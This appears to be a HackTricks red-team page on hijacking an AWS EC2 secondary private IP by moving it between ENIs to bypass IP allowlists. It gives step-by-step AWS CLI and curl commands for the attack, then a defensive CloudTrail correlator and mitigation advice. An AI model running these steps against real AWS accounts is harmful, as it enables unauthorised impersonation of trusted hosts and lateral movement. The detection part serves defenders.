AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse ec2:UnassignPrivateIpAddresses and ec2:AssignPrivateIpAddresses to steal a secondary private IP from a victim ENI and move it to an attacker-controlled ENI in the same subnet/AZ. Many internal services and security groups restrict access to specific private IPs. Once that secondary address has been moved, the VPC delivers traffic for it to the attacker ENI, so the attacker impersonates the trusted host at L3 and can reach the allowlisted services.
Prereqs:
- Permissions: ec2:DescribeNetworkInterfaces, ec2:UnassignPrivateIpAddresses on the victim ENI ARN, and ec2:AssignPrivateIpAddresses on the attacker ENI ARN.
- Both ENIs must be in the same subnet/AZ. The target address must be a secondary IP (the primary IP cannot be unassigned).
Variables:
- REGION=us-east-1
- VICTIM_ENI=
- ATTACKER_ENI=
- PROTECTED_SG=   # SG on a target service that allows only $HIJACK_IP
- PROTECTED_HOST=
Steps:
- Pick a secondary IP from the victim ENI (the query is single-quoted because the JMESPath literal uses backticks, which bash would otherwise treat as command substitution; --output text prints the list tab-separated on one line, so it is split before taking the first address)
aws ec2 describe-network-interfaces --network-interface-ids $VICTIM_ENI --region $REGION --query 'NetworkInterfaces[0].PrivateIpAddresses[?Primary==`false`].PrivateIpAddress' --output text | tr '\t' '\n' | head -n1 | tee HIJACK_IP
export HIJACK_IP=$(cat HIJACK_IP)
- Make sure the protected host allows only that IP (idempotent). If SG-to-SG rules are used instead, skip this step.
aws ec2 authorize-security-group-ingress --group-id $PROTECTED_SG --protocol tcp --port 80 --cidr "$HIJACK_IP/32" --region $REGION || true
- Baseline: from the attacker instance (reached e.g. via SSM/SSH), a request to PROTECTED_HOST should fail without the spoofed source
curl -sS --max-time 3 http://$PROTECTED_HOST || true
- Unassign the secondary IP from the victim ENI
aws ec2 unassign-private-ip-addresses --network-interface-id $VICTIM_ENI --private-ip-addresses $HIJACK_IP --region $REGION
- Assign the same IP to the attacker ENI (adding --allow-reassignment lets AWS move the address even while it is still assigned to the victim ENI, which makes the unassign step optional)
aws ec2 assign-private-ip-addresses --network-interface-id $ATTACKER_ENI --private-ip-addresses $HIJACK_IP --region $REGION
- Verify that ownership has moved
aws ec2 describe-network-interfaces --network-interface-ids $ATTACKER_ENI --region $REGION --query 'NetworkInterfaces[0].PrivateIpAddresses[].PrivateIpAddress' --output text | grep -w $HIJACK_IP
- From the attacker instance, source-bind to the hijacked IP to reach the protected host (make sure the IP is configured in the OS; if it is not, add it with ip addr add $HIJACK_IP/<mask> dev eth0)
curl --interface $HIJACK_IP -sS http://$PROTECTED_HOST -o /tmp/poc.out && head -c 80 /tmp/poc.out
Impact
- Bypass IP allowlists and impersonate a trusted host inside the VPC by moving secondary private IPs between ENIs in the same subnet/AZ.
- Reach internal services that restrict access to specific source IPs, enabling lateral movement and data access.
- Side effects: the victim loses the address (its traffic is now delivered to the attacker ENI), and both API calls are recorded in CloudTrail, so the move is disruptive and attributable.
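The detection side of this trick, as an added example that is not HackTricks' or AWS' code: a small correlator run over constructed CloudTrail records that flags a secondary private IP leaving one ENI and appearing on another, covering both the unassign-then-assign sequence above and the variant that skips the unassign step with --allow-reassignment. The event field layout it reads (requestParameters.networkInterfaceId, privateIpAddressesSet.items[].privateIpAddress, allowReassignment) is assumed from the EC2 query API parameter names and should be checked against events from a real trail before use.

```python
"""Spot a secondary private IP moving between ENIs in CloudTrail.

Added example for this page, not HackTricks' or AWS' code. It assumes the
CloudTrail requestParameters layout used in the constructed records below
(networkInterfaceId, privateIpAddressesSet.items[].privateIpAddress and
allowReassignment); verify that against events from your own trail.
"""
import json
from datetime import datetime, timedelta, timezone

# Constructed sample records (not captured from a real account). The first two
# are the page's sequence: unassign from the victim ENI, assign to the attacker
# ENI seconds later. The last one skips the unassign by using allowReassignment.
SAMPLE_EVENTS = [
    {
        "eventTime": "2024-05-01T12:00:00Z",
        "eventName": "UnassignPrivateIpAddresses",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
        "requestParameters": {
            "networkInterfaceId": "eni-0aaaaaaaaaaaaaaaa",
            "privateIpAddressesSet": {"items": [{"privateIpAddress": "10.0.1.50"}]},
        },
    },
    {
        "eventTime": "2024-05-01T12:00:05Z",
        "eventName": "AssignPrivateIpAddresses",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
        "requestParameters": {
            "networkInterfaceId": "eni-0bbbbbbbbbbbbbbbb",
            "privateIpAddressesSet": {"items": [{"privateIpAddress": "10.0.1.50"}]},
            "allowReassignment": False,
        },
    },
    {
        "eventTime": "2024-05-01T12:05:00Z",
        "eventName": "AssignPrivateIpAddresses",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:role/deploy"},
        "requestParameters": {
            "networkInterfaceId": "eni-0cccccccccccccccc",
            "privateIpAddressesSet": {"items": [{"privateIpAddress": "10.0.1.77"}]},
            "allowReassignment": False,
        },
    },
    {
        "eventTime": "2024-05-01T12:30:00Z",
        "eventName": "AssignPrivateIpAddresses",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
        "requestParameters": {
            "networkInterfaceId": "eni-0dddddddddddddddd",
            "privateIpAddressesSet": {"items": [{"privateIpAddress": "10.0.1.50"}]},
            "allowReassignment": True,
        },
    },
]

WATCHED = ("AssignPrivateIpAddresses", "UnassignPrivateIpAddresses")


def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def event_ips(event):
    """Private IPs named in the request (empty if the set is absent)."""
    params = event.get("requestParameters") or {}
    items = (params.get("privateIpAddressesSet") or {}).get("items") or []
    return [i["privateIpAddress"] for i in items if "privateIpAddress" in i]


def find_ip_moves(events, window=timedelta(minutes=15)):
    """Return one alert per secondary IP that changes ENI.

    Two paths: an Unassign followed within `window` by an Assign onto a
    different ENI, and an Assign with allowReassignment=true onto an ENI that
    differs from the last owner seen (no Unassign event exists in that case).
    `owner` only knows IPs seen assigned in the log; seed it from
    DescribeNetworkInterfaces to also catch moves of long-lived addresses.
    """
    released = {}  # ip -> (eni, time, actor) from the latest Unassign
    owner = {}     # ip -> eni from the latest Assign
    alerts = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev.get("eventName") not in WATCHED:
            continue
        params = ev.get("requestParameters") or {}
        eni = params.get("networkInterfaceId")
        when = parse_time(ev["eventTime"])
        actor = (ev.get("userIdentity") or {}).get("arn", "unknown")
        for ip in event_ips(ev):
            if ev["eventName"] == "UnassignPrivateIpAddresses":
                released[ip] = (eni, when, actor)
                continue
            prev = released.pop(ip, None)
            if prev and prev[0] != eni and when - prev[1] <= window:
                alerts.append({"ip": ip, "from_eni": prev[0], "to_eni": eni,
                               "via": "unassign-then-assign", "actor": actor,
                               "time": ev["eventTime"]})
            elif params.get("allowReassignment") and ip in owner and owner[ip] != eni:
                alerts.append({"ip": ip, "from_eni": owner[ip], "to_eni": eni,
                               "via": "allow-reassignment", "actor": actor,
                               "time": ev["eventTime"]})
            owner[ip] = eni
    return alerts


if __name__ == "__main__":
    print(json.dumps(find_ip_moves(SAMPLE_EVENTS), indent=2))
```

Legitimate HA failover (keepalived or similar moving a floating secondary IP between peers) produces exactly this pattern, so in practice the actor ARN is compared against the role expected to move that address; anything else is worth a look. The structural fix is the one the second step hints at: reference security groups from security group rules instead of /32 private IPs, since a moved address does not carry the victim's group membership with it.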